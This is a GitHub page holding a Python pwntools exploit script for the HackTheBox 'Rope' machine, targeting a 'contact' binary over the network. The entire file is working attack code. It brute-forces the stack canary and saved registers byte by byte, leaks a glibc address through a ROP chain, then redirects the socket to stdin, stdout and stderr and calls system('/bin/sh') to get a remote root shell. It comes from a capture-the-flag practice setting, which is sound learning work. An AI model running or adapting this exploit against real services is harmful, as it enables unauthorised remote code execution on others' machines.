HackTheBox-scripts/Machines/Rope/root_exploit.py at main · 7Rocky/HackTheBox-scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/env python3

from pwn import *

context.binary = elf = ELF('contact')
glibc = ELF('libc.so.6', checksec=False)


def get_process():
    if len(sys.argv) != 2:
        log.error(f'Usage: python3 {sys.argv[0]} <ip:port>')

    host, port = sys.argv[1].split(':')
    return remote(host, int(port))


def brute_force_value(payload: bytes, name: str, start: bytes = b'') -> bytes:
    value = start
    value_prog = log.progress(name)

    while len(value) < 8:
        for b in range(256):
            with context.local(log_level='CRITICAL'):
                p = get_process()

            test_value = value + p8(b)
            value_prog.status(test_value.hex())
            p.sendafter(b'admin:\n', payload + test_value)

            try:
                if b'Done.' in p.recv(timeout=1):
                    value = test_value
                    break
            except EOFError:
                pass
            finally:
                with context.local(log_level='CRITICAL'):
                    p.close()

    value_prog.success(value.hex())

    return value


def main():
    offset = 56
    junk = b'A' * offset

    canary    = brute_force_value(junk,                      'Canary    ', start=b'\0')
    saved_rbp = brute_force_value(junk + canary,             'Saved $rbp', )
    saved_rip = brute_force_value(junk + canary + saved_rbp, 'Saved $rip', start=b'\x62')

    print()
    elf.address = u64(saved_rip) - 0x1562
    log.success(f'ELF base address: {hex(elf.address)}')

    print()
    rop = ROP(elf)
    socket_fd = 4

    payload  = junk
    payload += canary
    payload += saved_rbp
    payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
    payload += p64(socket_fd)
    payload += p64(rop.find_gadget(['pop rsi', 'pop r15', 'ret'])[0])
    payload += p64(elf.got.send)
    payload += p64(0)
    payload += p64(rop.find_gadget(['pop rdx', 'ret'])[0])
    payload += p64(8)
    payload += p64(elf.plt.write)

    with context.local(log_level='CRITICAL'):
        p = get_process()
        p.sendlineafter(b'admin:\n', payload)

        send_addr = u64(p.recv().ljust(8, b'\0'))
        glibc.address = send_addr - glibc.symbols.send
        p.close()

    print()
    log.success(f'Leaked send() address: {hex(send_addr)}')
    log.success(f'Glibc base address   : {hex(glibc.address)}')

    print()
    rop = ROP([elf, glibc])

    payload  = junk
    payload += canary
    payload += saved_rbp

    for fd in [0, 1, 2]:
        payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
        payload += p64(socket_fd)
        payload += p64(rop.find_gadget(['pop rsi', 'ret'])[0])
        payload += p64(fd)
        payload += p64(glibc.symbols.dup2)

    payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
    payload += p64(next(glibc.search(b'/bin/sh')))
    payload += p64(glibc.symbols.system)

    with context.local(log_level='CRITICAL'):
        p = get_process()
        p.sendlineafter(b'admin:\n', payload)

    print()
    p.interactive()


if __name__ == '__main__':
    main()